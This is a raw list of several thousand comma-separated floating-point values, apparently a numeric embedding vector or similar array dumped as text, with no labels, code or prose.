0.012619185261428356, -0.013512235134840012, -0.014941115863621235, -0.0006246496923267841, 0.02593727968633175, -0.004783642012625933, -0.008961562998592854, 0.013869455084204674, 0.03320593014359474, -0.01546917948871851, 0.005793176591396332, -0.016835935413837433, 0.005633980967104435, 0.015826400369405746, 0.026030467823147774, -0.01062341220676899, 0.026154717430472374, 0.010934039019048214, -0.012937577441334724, 0.017814407125115395, 0.008076278492808342, -0.008596577681601048, -0.02247379906475544, 0.00018516228010412306, 0.012634716928005219, -0.044916532933712006, -0.01618362031877041, -0.01859097182750702, -0.008588811382651329, 0.01876181736588478, 0.00032712810207158327, -0.04230727627873421, -0.025906216353178024, -0.022302953526377678, 0.025890685617923737, -0.0496380515396595, 0.009862378239631653, -0.006620218977332115, -0.017332935705780983, -0.01908797398209572, 0.03513181209564209, 0.02876397781074047, 0.03019285760819912, -0.014444113709032536, 0.0041313269175589085, 0.009155704639852047, 0.03845551237463951, -0.030658796429634094, 0.010141941718757153, -0.015018772333860397, 0.01759696938097477, -0.002166616963222623, 0.006585273426026106, 0.040785208344459534, -0.005373831372708082, 0.01796972006559372, 0.03643644228577614, -0.0063561866991221905, -0.015018772333860397, 0.023793959990143776, 0.025968341156840324, 0.00929548591375351, -0.015632258728146553, -0.01728634163737297, 0.0018433717777952552, -0.0028286390006542206, 0.0038653535302728415, -0.017565906047821045, 0.04737047851085663, -0.036405377089977264, -0.007827777415513992, 0.00300142471678555, -0.0032673983369022608, 0.022380610927939415, 0.020221758633852005, -0.007785066496580839, 0.001901614130474627, 0.005420425441116095, -0.007691878825426102, -0.030705390498042107, -0.021774889901280403, -0.020237291231751442, 0.006864836905151606, 0.0030208388343453407, -0.04261790215969086, 0.0005824239342473447, 0.028562070801854134, 0.02074982412159443, -0.008627640083432198, -0.006725055165588856, -0.007404549513012171, 0.0039624241180717945, -0.014809099026024342, 0.004694337025284767, -0.014622723683714867, -0.03432418406009674, 0.010856382548809052, -0.0019064677180722356, 0.006849305704236031, -0.006596921943128109, -0.036032628268003464, 0.004158507101237774, 0.01778334379196167, 0.012122183106839657, -0.023483334109187126, -0.004539024084806442, -0.00969153456389904, -0.01355106383562088, 0.0070162671618163586, 0.0064027803018689156, 0.004286640323698521, -0.0006756117800250649, 0.012114417739212513, -0.0060377949848771095, -0.0050903852097690105, -0.017503781244158745, 0.03345442935824394, -0.0035197820980101824, 0.023234833031892776, 0.002465594559907913, -0.010266192257404327, -0.005315589252859354, -0.01859097182750702, 0.014327628538012505, -0.0033120508305728436, 0.020361540839076042, 0.01691359095275402, -0.007990856654942036, 0.004500195849686861, -0.010732132010161877, -0.00228310190141201, 0.011780494824051857, -0.0014259679010137916, -0.001723974826745689, -0.004480781499296427, -0.0030538428109139204, -0.03870401158928871, -0.009489627555012703, 0.04271109029650688, -0.01890159770846367, -0.013543297536671162, -0.0004115795891266316, 0.011912510730326176, 0.010732132010161877, 0.017736749723553658, -0.006923079025000334, -0.013473407365381718, -0.003791579743847251, 0.0012910397490486503, -0.0246326494961977, 0.015779806300997734, -0.034106746315956116, -0.012828857637941837, 0.01598171330988407, -0.018187157809734344, 0.000254325132118538, -0.012417278252542019, -0.000344600819516927, 0.01540705468505621, 0.01624574512243271, -0.005043791141360998, 0.031575143337249756, -0.00768799614161253, -0.0064532570540905, 0.015539070591330528, 0.02141766995191574, 0.0024422977585345507, 0.014855693094432354, 0.0035722001921385527, -0.0060028494335711, 0.02191467210650444, -0.039294201880693436, 0.024896681308746338, -0.008650937117636204, -0.011128179728984833, -0.016338933259248734, -0.008790718391537666, 0.018792878836393356, -0.005944606848061085, -0.0036848022136837244, -0.015632258728146553, -0.004208983853459358, 0.002438414841890335, 0.004174038302153349, -0.003457656828686595, -0.00016963097732514143, -0.004717634059488773, -0.002191855339333415, 0.006899782456457615, -0.015678852796554565, -0.019740289077162743, 0.007990856654942036, 0.021075980737805367, 0.030845170840620995, -0.0008877111249603331, -0.009404204785823822, -0.010180770419538021, 0.012199840508401394, 0.0016463183565065265, -0.004084733314812183, -0.006794945802539587, -0.028111662715673447, -0.015337163582444191, 0.018373534083366394, 0.01420337799936533, -0.023234833031892776, 0.014444113709032536, 0.003376117441803217, 0.008449030108749866, 0.05662713944911957, 0.00438371067866683, -0.006515382323414087, -0.0018268697895109653, -0.004034256562590599, -0.00830924790352583, 0.008565514348447323, 0.015888525173068047, 0.01169507298618555, 0.00470598554238677, -0.019724756479263306, 0.007136634550988674, -0.016634028404951096, 0.022069985046982765, -0.013908283784985542, -0.018373534083366394, -0.009217829443514347, -0.007975324988365173, 0.007179345935583115, -0.013077358715236187, 0.016711683943867683, 0.0039488342590630054, -0.0037236304488033056, 0.01969369500875473, 0.021075980737805367, 0.0014414992183446884, -0.01641658879816532, -0.02772337943315506, -0.01790759526193142, -0.0014521770644932985, 0.027397222816944122, 0.019678164273500443, 0.004146858584135771, 0.022737830877304077, -0.011073820292949677, 0.016028307378292084, 0.016385527327656746, -0.0024442391004413366, 0.004822470247745514, -0.0029936591163277626, 0.01851331628859043, -0.011314556002616882, -0.006600804626941681, -0.022442735731601715, 0.038672950118780136, -0.014995475299656391, -0.004535140935331583, 0.027863161638379097, -0.008821780793368816, 0.0010512751759961247, 0.028608663007616997, -0.006006732117384672, -0.007742355577647686, -0.04000864177942276, -0.019103504717350006, 0.008052981458604336, -0.002201562514528632, -0.0045778523199260235, 0.005610683932900429, 0.020718760788440704, -0.008006387390196323, -0.02037707157433033, -0.015608961693942547, -0.02425989881157875, 0.01915009878575802, 0.006092154420912266, -0.0022908675018697977, -0.0027956347912549973, 0.007870488800108433, 0.012518231756985188, 0.005043791141360998, 0.000633871357422322, 0.007381252478808165, -0.005121447611600161, -0.00456620380282402, -0.004469132982194424, 0.012821092270314693, 0.0019812120590358973, -0.02352992631494999, 0.03242936357855797, -0.022815486416220665, -0.027304034680128098, 0.011423274874687195, 0.011190305463969707, 0.014071362093091011, 0.0021724412217736244, -0.03631219267845154, -0.019289880990982056, 0.005222401116043329, 0.007493854500353336, 0.023374613374471664, 0.008084043860435486, 0.0008377197664231062, 0.007816129364073277, 0.01448294147849083, 0.0047603449784219265, 0.02106045000255108, 0.02012857049703598, -0.025657715275883675, 0.015725446864962578, -0.021557452157139778, -0.016276808455586433, 0.004589500837028027, 0.01666508987545967, 0.0117261353880167, -0.02884163334965706, 0.014793568290770054, 0.010103113949298859, -0.0007076450856402516, -0.013652017340064049, -0.04094051942229271, 0.004748696461319923, -0.008417967706918716, 0.026139186695218086, -0.01821822114288807, 0.02475690096616745, -0.000330525595927611, 0.0011454337509348989, 0.004220631904900074, -0.011104882694780827, 0.02907460369169712, 0.010235129855573177, -0.010444802232086658, 0.017892062664031982, -0.0014084952417761087, -0.029664792120456696, -0.026807032525539398, 0.028919290751218796, 0.015282804146409035, 0.011469868943095207, -0.025471340864896774, 0.010297255590558052, 0.04550672322511673, -0.008806250058114529, 0.020175164565443993, 0.0027043884620070457, -0.00793649721890688, -0.010887444950640202, -0.023374613374471664, -0.02544027753174305, 0.0016230213223025203, -0.01778334379196167, -0.022116579115390778, 0.01630786992609501, -0.0076491679064929485, -0.010941804386675358, -0.013426813296973705, 0.012743435800075531, 0.004469132982194424, -0.00536994868889451, 0.0130618279799819, 0.00484576728194952, -0.002426766324788332, 0.01946072466671467, -0.0014143195003271103, -0.015430351719260216, 0.015795337036252022, -0.0022423320915549994, 0.012603653594851494, 0.022924205288290977, -0.00040429929504171014, -0.0008095692610368133, 0.008037450723350048, 0.009994395077228546, -0.02853100746870041, 0.00740843266248703, -0.00228310190141201, 0.01747271791100502, 0.025114120915532112, 0.003003366058692336, 0.0018579323077574372, -0.0060416776686906815, -0.012044526636600494, 0.02135554514825344, 0.015018772333860397, -0.0010736014228314161, 0.00966047216206789, -0.010056519880890846, -0.011244664900004864, -0.011834854260087013, 0.0052612293511629105, 0.005637863650918007, 0.008107340894639492, 0.011702838353812695, 0.006426077336072922, -0.022939737886190414, -0.015399289317429066, -0.004783642012625933, 0.03618793934583664, -0.006849305704236031, 0.017022309824824333, 0.0047603449784219265, -0.00463221175596118, -0.01355106383562088, 0.0025976106990128756, -0.025222839787602425, 0.0029606549069285393, -0.0050593228079378605, 0.019041379913687706, 0.001970534212887287, 0.01593511924147606, 0.007703527342528105, -0.008604343049228191, -0.00827818550169468, 0.0006241642986424267, 0.0052612293511629105, 0.006216404959559441, 0.006822125520557165, -0.029711386188864708, -0.006115451455116272, -0.0017016485799103975, 0.022753361612558365, 0.0035857900511473417, 0.015212913043797016, 0.015640024095773697, 0.011213602498173714, 0.023421207442879677, 0.007897668518126011, -0.00410803034901619, -0.01309289038181305, -0.0026519703678786755, -0.00779283232986927, -0.01747271791100502, -0.003680919297039509, 0.014032534323632717, 0.00796755962073803, -0.013201609253883362, 0.00029655086109414697, 0.014001471921801567, -0.012689076364040375, 0.003515899181365967, -0.00814616959542036, -0.009373142383992672, -0.008379139006137848, -0.009109110571444035, -0.0005668926169164479, -0.03062773309648037, -0.0016637910157442093, -0.0029373581055551767, -0.006363952066749334, -0.014809099026024342, 0.029276510700583458, 0.008899438194930553, 0.02617024816572666, -0.025114120915532112, 0.0015919588040560484, -0.005657278001308441, -0.00978472176939249, -0.010778726078569889, 0.010134176351130009, -0.027645722031593323, -0.015414820052683353, 0.003461539512500167, -0.02197679691016674, -0.02309505082666874, 0.0024325905833393335, -0.014840162359178066, -0.021262357011437416, 0.01946072466671467, -0.0073540727607905865, 0.007812246214598417, -0.004558437969535589, 0.003292636713013053, -0.01629233919084072, 0.0016793223330751061, 0.0009362464770674706, -0.001308512408286333, -0.007389018312096596, 0.001819104072637856, 0.005439839791506529, 0.011174773797392845, -0.004348765593022108, -0.017488248646259308, 0.021402139216661453, -0.0008605313487350941, -0.033671870827674866, -0.007024032529443502, 0.01343457866460085, 0.003234394360333681, -0.012153246439993382, -0.0052728778682649136, 0.028484413400292397, -0.0006911430973559618, 0.009637175127863884, -0.0010444802464917302, -0.0029373581055551767, -0.018125033006072044, -0.008868374861776829, -0.01896372251212597, 0.014684848487377167, -0.019584976136684418, 0.004810821730643511, -0.014024768024682999, 0.01692912168800831, 0.0025956693571060896, -0.0033508790656924248, 0.0032305114436894655, -0.033671870827674866, -0.006973555777221918, -0.012541528791189194, 0.0026228490751236677, -0.01618362031877041, 0.010794256813824177, -0.015034303069114685, 0.01618362031877041, 0.0024539462756365538, -0.007280299440026283, 0.001955973682925105, 0.024741368368268013, 0.009978863410651684, -0.004799173213541508, -0.015135256573557854, -0.005012728739529848, 0.013349156826734543, -0.009279955178499222, 0.0024850089102983475, -0.0015502184396609664, 0.004092498682439327, 0.017705688253045082, 0.007412315346300602, 0.016463182866573334, -0.0015443941811099648, -0.017705688253045082, -0.0012308559380471706, 0.0018559909658506513, 0.008122872561216354, 0.025114120915532112, -0.006845422554761171, 0.0029121197294443846, 0.02629449963569641, 0.0018336647190153599, 0.022147640585899353, 0.01225419994443655, 0.0018754050834104419, 0.014545067213475704, 0.010421506129205227, 0.0009595434530638158, -0.002269512042403221, 0.02728850208222866, -0.011392212472856045, 0.0235143955796957, -0.011353383772075176, -0.013387984596192837, -0.01435869187116623, -0.011415509507060051, 0.0026422631926834583, 0.013411281630396843, -0.02500540018081665, 0.008084043860435486, 0.0014958587707951665, 0.0039449515752494335, -0.003430477110669017, -0.00680659431964159, 0.014467410743236542, 0.020532384514808655, -0.0131239527836442, 0.010204067453742027, 0.009435268118977547, -0.00589801324531436, -0.012984170578420162, -0.02321930043399334, -0.0009192590950988233, 0.006841539870947599, -0.011011695489287376, -0.0016686446033418179, -0.004449719097465277, -0.0014084952417761087, 0.017332935705780983, -0.008107340894639492, -0.01643212139606476, -0.00484576728194952, 0.0047292825765907764, 0.02834463119506836, 0.019119037315249443, 0.01070883497595787, -0.0007857869495637715, -0.0019132626475766301, -0.011772729456424713, 0.01834247075021267, -0.004830236081033945, -0.005533027462661266, -0.011003929190337658, -0.005039908457547426, -0.006713406648486853, 0.0028907640371471643, 0.003599379910156131, 0.01925881765782833, -0.005816473625600338, -0.005451487842947245, -0.01330256275832653, -0.010126410983502865, 0.01784546859562397, -0.008037450723350048, -0.008332544937729836, -0.006076623219996691, -0.002481125993654132, 0.005544675979763269, -0.004465250298380852, -0.0240113977342844, -0.008045216090977192, 0.006080505903810263, -0.006961907260119915, 0.007097806315869093, -0.0011444630799815059, -0.010949569754302502, 0.004674922674894333, 0.009435268118977547, -0.019289880990982056, 0.00529617490246892, 0.008138404227793217, -0.00824712309986353, -0.00873635895550251, -0.01299193687736988, 0.014700380153954029, -0.0057232859544456005, 0.01126796193420887, -0.00929548591375351, 0.014964411966502666, 0.011601884849369526, -0.012052292935550213, -0.0035450204741209745, 0.009986628778278828, -0.007478323299437761, 0.007435612380504608, 0.011640713550150394, -0.008495624177157879, -0.03221192583441734, 0.005529144778847694, 0.01473144255578518, -0.026993408799171448, -0.001613314263522625, 0.0036692707799375057, 0.02106045000255108, 0.02129341848194599, 0.009590581059455872, 0.034790124744176865, -0.007544331252574921, -0.000025632720280555077, 0.014490707777440548, 0.019367536529898643, -0.018000783398747444, -0.005206869915127754, -0.002661677310243249, 0.014770271256566048, -0.0011502872221171856, -0.01231632474809885, -0.002811166225001216, -0.0018627858953550458, 0.0006348420865833759, 0.0037527515087276697, 0.0029160024132579565, -0.004966134671121836, 0.008518921211361885, -0.009808018803596497, 0.0039294203743338585, 0.011842619627714157, -0.022178703919053078, -0.010382677428424358, -0.004616680555045605, -0.01851331628859043, -0.012821092270314693, 0.005579621531069279, -0.005288409534841776, 0.004601148888468742, 0.016634028404951096, 0.005824239458888769, -0.012836623936891556, -0.004655508790165186, 0.005991200916469097, 0.001873463625088334, -0.024430742487311363, -0.02253592386841774, -0.020843012258410454, -0.006084388587623835, 0.005828122142702341, 0.030348170548677444, -0.0063872491009533405, 0.018187157809734344, -0.020578978583216667, 0.015329398214817047, -0.009885675273835659, 0.010670006275177002, -0.01411019079387188, 0.00821606069803238, 0.006488202605396509, -0.015640024095773697, 0.003923595882952213, 0.006344538182020187, -0.013605423271656036, 0.006596921943128109, -0.003082964103668928, 0.022147640585899353, -0.021464264020323753, 0.005202987231314182, -0.008596577681601048, -0.00533888628706336, -0.0015366284642368555, 0.01938306912779808, 0.006274647079408169, 0.016634028404951096, 0.00824712309986353, -0.0250675268471241, 0.006006732117384672, 0.006627984344959259, 0.0012017347617074847, -0.0018443424487486482, -0.001019241870380938, 0.028375694528222084, 0.008006387390196323, -0.009388674050569534, 0.015391523018479347, 0.006651281379163265, -0.005300058051943779, -0.009707065299153328, 0.005936841480433941, -0.014195612631738186, -0.018171627074480057, 0.013248203322291374, 0.011664009653031826, -0.014583894982933998, 0.003908064682036638, 0.008829547092318535, 0.0005251522525213659, 0.011702838353812695, 0.015282804146409035, 0.021868078038096428, 0.004527375567704439, -0.00799862202256918, 0.001722033484838903, -0.0029703620821237564, 0.005882481578737497, 0.01709996722638607, -0.012393981218338013, -0.027443816885352135, 0.0007780212908983231, -0.0030674326699227095, 0.0014434406766667962, -0.0018074556719511747, 0.009924503974616528, 0.0009969156235456467, -0.0245705246925354, 0.0008386904955841601, -0.012665779329836369, -0.01969369500875473, 0.009644940495491028, 0.026900220662355423, 0.008184997364878654, 0.010180770419538021, -0.004340999759733677, -0.01448294147849083, -0.0010405974462628365, 0.011314556002616882, 0.010600116103887558, 0.012984170578420162, -0.024912213906645775, 0.01039820909500122, 0.01577204093337059, 0.0047292825765907764, 0.020656635984778404, 0.00811510719358921, -0.01593511924147606, -0.001901614130474627, 0.008285950869321823, 0.02402692846953869, 0.008557748980820179, 0.010483630932867527, -0.022799955680966377, 0.00357996579259634, 0.008619874715805054, 0.0015104194171726704, 0.007952027954161167, -0.021930202841758728, -0.0010415681172162294, -0.015484711155295372, 0.007952027954161167, 0.017239749431610107, 0.0018540495075285435, -0.013947111554443836, -0.009031454101204872, 0.027738910168409348, -0.011198070831596851, -0.009303251281380653, 0.011198070831596851, 0.01566332019865513, 0.016587434336543083, -0.01309289038181305, -0.017317404970526695, -0.00470598554238677, -0.025176245719194412, -0.013706376776099205, 0.01610596291720867, 0.022893143817782402, 0.0011454337509348989, -0.028204848989844322, 0.00904698483645916, 0.006791063118726015, 0.01636999472975731, 0.012401747517287731, 0.024244366213679314, -0.004337117075920105, -0.014576129615306854, -0.0037818728014826775, 0.004201218020170927, -0.004764227662235498, -0.0030091903172433376, -0.018000783398747444, 0.018482252955436707, 0.0033702931832522154, 0.003566375933587551, 0.004667157307267189, -0.015500242821872234, 0.018808409571647644, 0.010405974462628365, 0.0067017581313848495, 0.014195612631738186, 0.014809099026024342, -0.006026146467775106, 0.01915009878575802, 0.010724365711212158, -0.026760438457131386, 0.007377369794994593, -0.007105572149157524, 0.022924205288290977, 0.00206954637542367, 0.012393981218338013, 0.006662929896265268, 0.005886364728212357, -0.015042069368064404, 0.006600804626941681, 0.03062773309648037, -0.006096037104725838, 0.000344600819516927, -0.006010615266859531, -0.023063987493515015, 0.007423963863402605, 0.01098839845508337, 0.009039219468832016, -0.04476122185587883, 0.016696153208613396, -0.0036867435555905104, -0.03196342661976814, -0.02068769745528698, 0.024974338710308075, 0.014925584197044373, -0.007827777415513992, -0.0013929639244452119, 0.00003509710950311273, 0.00820829439908266, -0.011135946027934551, -0.0052573466673493385, -0.009008157067000866, 0.012129949405789375, -0.012642482295632362, -0.005451487842947245, -0.01672721467912197, -0.008635405451059341, -0.012463872320950031, -0.00008402678940910846, -0.01031278632581234, -0.005051556974649429, 0.011508696712553501, 0.021992327645421028, -0.006270764395594597, -0.006752234883606434, -0.010452568531036377, 0.028422288596630096, 0.02135554514825344, 0.014661552384495735, -0.02197679691016674, 0.016835935413837433, -0.004935072269290686, -0.0031023782212287188, 0.0016327284974977374, -0.010087582282721996, -0.014708145521581173, 0.013985940255224705, -0.013877221383154392, 0.011423274874687195, 0.011462102644145489, 0.006992970127612352, -0.0038770020473748446, -0.010382677428424358, 0.0036770363803952932, 0.01686699688434601, -0.007326893042773008, -0.023623114451766014, -0.019227756187319756, -0.021961266174912453, -0.0010619530221447349, -0.017022309824824333, -0.014071362093091011, 0.010910741984844208, 0.005630098283290863, -0.024896681308746338, -0.04246258735656738, 0.044730156660079956, 0.030394764617085457, 0.020765354856848717, -0.0075326827354729176, 0.018808409571647644, -0.017550375312566757, 0.03755469620227814, -0.02766125462949276, 0.002849994460120797, -0.005967903882265091, -0.016261275857686996, 0.00016247201710939407, 0.010134176351130009, 0.00550973042845726, -0.002385996747761965, -0.0032402186188846827, -0.001017300528474152, -0.0014308214886114001, 0.0068376571871340275, -0.01587299443781376, -0.021526388823986053, -0.006608570460230112, -0.004542906768620014, -0.009497392922639847, -0.021759359166026115, 0.005501964595168829, -0.006849305704236031, 0.0011764963855966926, -0.008239357732236385, 0.013481172733008862, -0.017767813056707382, -0.021013855934143066, -0.020516853779554367, -0.0049117752350866795, -0.003937185741961002, 0.0029936591163277626, 0.02567324787378311, -0.0016346698394045234, 0.009256658144295216, -0.00040866745985113084, -0.004022608045488596, 0.007101688999682665, 0.0020753706339746714, 0.008907203562557697, 0.004647742956876755, 0.03135770559310913, 0.008759655989706516, 0.0018550202948972583, -0.022007858380675316, 0.005098151043057442, 0.0019938312470912933, -0.009311017580330372, 0.00108816206920892, 0.014180081896483898, -0.011632947251200676, -0.01515855360776186, -0.016898060217499733, -0.013698611408472061, -0.0030907297041267157, 0.006655164062976837, -0.014964411966502666, -0.012471637688577175, 0.019957726821303368, 0.013193843886256218, -0.002232625149190426, 0.006860954221338034, -0.01185815129429102, 0.00242288364097476, -0.02408905327320099, -0.025580059736967087, -0.012083355337381363, 0.014312097802758217, 0.015515773557126522, -0.000820732384454459, -0.03252255171537399, 0.0035760828759521246, -0.0019122919766232371, 0.006577507592737675, 0.00743949506431818, 0.0030635499861091375, -0.03233617544174194, -0.014521770179271698, 0.0016744688618928194, 0.004643860273063183, -0.005855301860719919, 0.00018346354772802442, 0.020361540839076042, 0.01815609633922577, 0.0013191902544349432, -0.008153934963047504, 0.03783426061272621, -0.015740977600216866, -0.0008401465020142496, 0.004993314389139414, -0.0021316716447472572, 0.022893143817782402, -0.007190994452685118, 0.01629233919084072, -0.0055757383815944195, 0.005901895929127932, -0.005152510479092598, 0.008635405451059341, -0.006472671404480934, 0.0052573466673493385, 0.003362527582794428, 0.023359082639217377, -0.012425043620169163, -0.022939737886190414, 0.01197463646531105, -0.011555290780961514, 0.0009027571068145335, 0.016137026250362396, -0.0028888226952403784, 0.005032142624258995, -0.0018676394829526544, -0.0013628719607368112, -0.020641105249524117, -0.003164503490552306, 0.008526686578989029, 0.005828122142702341, -0.01154752541333437, 0.006674578413367271, 0.011431040242314339, -0.011306789703667164, -0.0014958587707951665, -0.0034343597944825888, -0.01765909418463707, -0.00736572127789259, -0.01463048905134201, -0.022504860535264015, 0.021510858088731766, 0.009458565153181553, -0.0049428376369178295, -0.004333233926445246, -0.012106652371585369, 0.01623021438717842, 0.017876531928777695, -0.021572982892394066, 0.008992625400424004, -0.026775969192385674, -0.006367835216224194, 0.009582814760506153, -0.014809099026024342, -0.013349156826734543, -0.006274647079408169, 0.004550672136247158, -0.014242206700146198, -0.013318094424903393, 0.022955268621444702, 0.0001888024271465838, 0.014086893759667873, -0.021402139216661453, -0.004888478200882673, -0.019724756479263306, -0.00039944573654793203, -0.021572982892394066, 0.01407912839204073, 0.019864538684487343, -0.02716425247490406, -0.016680622473359108, 0.008021919056773186, -0.01796972006559372, 0.019429663196206093, -0.013620954938232899, -0.006740586366504431, -0.011291258968412876, 0.018917130306363106, -0.009707065299153328, -0.022085515782237053, -0.004166272468864918, -0.02191467210650444, -0.005661160685122013, 0.005133096128702164, -0.005583504214882851, 0.006235818844288588, -0.0012706548441201448, -0.012805560603737831, -0.000015971156244631857, 0.015143021941184998, 0.015034303069114685, -0.010079816915094852, 0.024554993957281113, -0.00010902248322963715, 0.013690845109522343, -0.00950515829026699, -0.015608961693942547, -0.0023083402775228024, -0.0020986676681786776, -0.0011968811741098762, -0.003995428327471018, 0.00005869741289643571, -0.014397519640624523, 0.013457875698804855, -0.007377369794994593, -0.020734291523694992, -0.004818587563931942, -0.010670006275177002, 0.0037508101668208838, -0.02666725032031536, -0.01709996722638607, 0.012448340654373169, 0.01491005253046751, 0.02500540018081665, -0.023576520383358, -0.003789638401940465, 0.01067777257412672, 0.03513181209564209, 0.0011677599977701902, 0.010266192257404327, -0.02396480366587639, 0.002851935802027583, -0.007777301128953695, 0.002717978321015835, 0.008837312459945679, 0.0036886848974972963, 0.0015181850176304579, 0.02093619853258133, -0.016323400661349297, -0.0025859621819108725, 0.008270420134067535, -0.01636999472975731, 0.004682688508182764, -0.019476257264614105, 0.02641874924302101, 0.0019045262597501278, 0.016820402815937996, -0.010180770419538021, 0.005665043368935585, -0.010444802232086658, -0.031280048191547394, 0.015779806300997734, -0.0052107530646026134, -0.015865227207541466, -0.010607881471514702, -0.04162389785051346, 0.019056910648941994, 0.009738128632307053, 0.039791204035282135, -0.007505503017455339, 0.012541528791189194, 0.02143320068717003, 0.007097806315869093, 0.007746238261461258, -0.009186767041683197, 0.006950259208679199, 0.011617416515946388, 0.003139265114441514, -0.018932661041617393, -0.0257509034126997, -0.02081194892525673, 0.007812246214598417, -0.004539024084806442, -0.014925584197044373, 0.01877734810113907, 0.01963157020509243, -0.017084434628486633, 0.007505503017455339, -0.0014812982408329844, 0.002617024816572666, 0.01946072466671467, -0.0021802070550620556, -0.023436740040779114, 0.015531305223703384, 0.009078048169612885, 0.0032169215846806765, 0.009062516503036022, -0.008565514348447323, -0.001848225248977542, -0.018000783398747444, 0.0028849400114268064, 0.023172706365585327, 0.005680575035512447, -0.0058747162111103535, -0.011066054925322533, 0.0020753706339746714, -0.003706157673150301, 0.013279265724122524, -0.013659782707691193, 0.016587434336543083, 0.003921654541045427, 0.010009925812482834, -0.01129902433604002, -0.006596921943128109, -0.005633980967104435, 0.020532384514808655, 0.012673544697463512, -0.00873635895550251, 0.0041274442337453365, -0.00144732347689569, 0.028872696682810783, -0.02537815272808075, -0.012525997124612331, -0.0024636532180011272, 0.00938090868294239, -0.01407912839204073, -0.02297079935669899, -0.004639977589249611, 0.011943573132157326, -0.001501683029346168, 0.020967261865735054, 0.0016171971801668406, -0.0001776393037289381, -0.01327150035649538, 0.007295830640941858, -0.0068726022727787495, -0.02352992631494999, 0.02191467210650444, 0.008829547092318535, -0.0037818728014826775, 0.008845077827572823, -0.012642482295632362, -0.004698219709098339, 0.022768892347812653, -0.006942493375390768, 0.000385370512958616, 0.025859622284770012, 0.003048018552362919, 0.004410890396684408, 0.011943573132157326, 0.010079816915094852, 0.0076491679064929485, 0.003760517342016101, 0.019367536529898643, 0.002848053118214011, 0.0016734980745241046, 0.013970408588647842, 0.03662281855940819, -0.012953108176589012, 0.003595497226342559, -0.03895251452922821, 0.014187847264111042, -0.005855301860719919, 0.00726865092292428, -0.010359380394220352, 0.0009716772474348545, -0.009404204785823822, -0.013030764646828175, -0.0017414476023986936, -0.001899672788567841, 0.01697571575641632, 0.014925584197044373, 0.004768110811710358, 0.005925192963331938, 0.006344538182020187, 0.002904354128986597, 0.051160119473934174, -0.0005872774636372924, -0.010468099266290665, 0.0031722690910100937, 0.004515727050602436, 0.0033722345251590014, 0.004857415799051523, -0.014187847264111042, 0.013178312219679356, -0.007093923632055521, 0.028111662715673447, 0.021945733577013016, 0.01907244324684143, -0.014700380153954029, -0.017006779089570045, 0.008472327142953873, 0.009186767041683197, 0.0025393683463335037, 0.01869969069957733, 0.002178265480324626, -0.008495624177157879, 0.010522458702325821, -0.0034537739120423794, -0.0017550374614074826, 0.02290867455303669, 0.00048074242658913136, 0.000502340670209378, 0.009303251281380653, 0.003789638401940465, 0.017239749431610107, 0.011749432422220707, -0.006061091553419828, 0.011275727301836014, 0.027505941689014435, -0.018917130306363106, 0.007272533606737852, -0.0012619185727089643, -0.003692567814141512, -0.0012619185727089643, -0.008666467852890491, -0.004620563238859177, 0.0003977470041718334, -0.03037923201918602, 0.0015958416042849422, 0.00466327415779233, -0.01790759526193142, 0.010996163822710514, 0.007210408337414265, -0.006301826797425747, -0.007451143581420183, 0.014739208854734898, -0.001956944353878498, 0.002836404601112008, 0.006317358464002609, -0.021868078038096428, 0.011563056148588657, 0.008814015425741673, -0.009373142383992672, 0.004053670447319746, 0.0010706892935559154, 0.01894819177687168, 0.003861470613628626, -0.0010007984237745404, -0.009994395077228546, 0.0007348248618654907, -0.005373831372708082, -0.01025066152215004, -0.0021472028456628323, -0.0023510511964559555, 0.009621643461287022, -0.00206954637542367, -0.005191338714212179, 0.015352695249021053, 0.011943573132157326, -0.023607583716511726, 0.010638943873345852, -0.012362918816506863, 0.006266881711781025, 0.0044303047470748425, -0.010926272720098495, 0.01988007128238678, -0.006515382323414087, -0.024912213906645775, -0.007024032529443502, 0.00033537912531755865, 0.01647871546447277, -0.025580059736967087, -0.006488202605396509, -0.009885675273835659, -0.005517496261745691, -0.02573537267744541, 0.005932958330959082, 0.002246215008199215, 0.018358003348112106, -0.0005576708936132491, -0.0020151869393885136, -0.024725837633013725, 0.00015470635844394565, 0.012790029868483543, -0.010227364487946033, -0.004166272468864918, -0.005711637437343597, 0.006395014934241772, -0.012106652371585369, 0.004814704414457083, 0.016276808455586433, 0.019616037607192993, -0.010980633087456226, -0.014304331503808498, 0.020035384222865105, 0.004473015666007996, -0.022551454603672028, -0.018482252955436707, -0.00821606069803238, 0.017503781244158745, -0.03416886925697327, 0.01028172392398119, -0.02377842739224434, 0.012083355337381363, -0.0006377542158588767, 0.01577204093337059, 0.009241126477718353, -0.02531602792441845, 0.015756508335471153, 0.012828857637941837, 0.021277887746691704, 0.008122872561216354, -0.015383757650852203, 0.005039908457547426, 0.0003941068716812879, -0.0055602071806788445, -0.0013308386551216245, 0.014560598880052567, -0.012479403987526894, 0.024787962436676025, 0.026589594781398773, -0.03050348348915577, -0.003399414476007223, -0.0070046186447143555, 0.0041313269175589085, -0.016571901738643646, 0.011306789703667164, -0.01042927149683237, 0.011873682960867882, 0.0041313269175589085, 0.01925881765782833, 0.0010910741984844208, -0.006631867028772831, 0.0006756117800250649, 0.007773417979478836, 0.001625933451578021, 0.012828857637941837, -0.005362182855606079, 0.012238668277859688, 0.03224299103021622, -0.01851331628859043, 0.008751890622079372, -0.01598171330988407, -0.00712886918336153, -0.018792878836393356, -0.015080897137522697, -0.005276761017739773, -0.0033567033242434263, -0.0007309420616365969, 0.006992970127612352, 0.01629233919084072, 0.01389275211840868, -0.02376289665699005, -0.013007467612624168, -0.007420081179589033, 0.005354417487978935, 0.005102033726871014, -0.01407912839204073, 0.0029548308812081814, 0.0050748540088534355, -0.004570086486637592, 0.005494199227541685, -0.0044458359479904175, -0.0027956347912549973, 0.007156048901379108, -0.02168170176446438, -0.0018559909658506513, -0.018792878836393356, 0.009008157067000866, 0.022116579115390778, 0.015694383531808853, -0.0006843481096439064, -0.0007721970905549824, 0.01655637100338936, 0.001654083956964314, -0.009241126477718353, -0.0014550891937687993, 0.017379529774188995, -0.01901031658053398, -0.0022772776428610086, 0.0002235051797470078, 0.0068531883880496025, -0.004236163571476936, -0.009963331744074821, -0.016711683943867683, -0.007544331252574921, 0.025719841942191124, 0.02623237483203411, 0.01612149551510811, -0.014071362093091011, 0.007905433885753155, -0.02359205298125744, 0.005039908457547426, 0.0072026425041258335, 0.003812935436144471, 0.01564778946340084, 0.008348076604306698, 0.008006387390196323, -0.0009556605946272612, 0.017332935705780983, 0.029773510992527008, 0.006243584677577019, 0.027940817177295685, -0.004643860273063183, 0.00047297676792368293, -0.0006712435861118138, 0.01925881765782833, 0.00484576728194952, 0.004997197538614273, 0.011306789703667164, 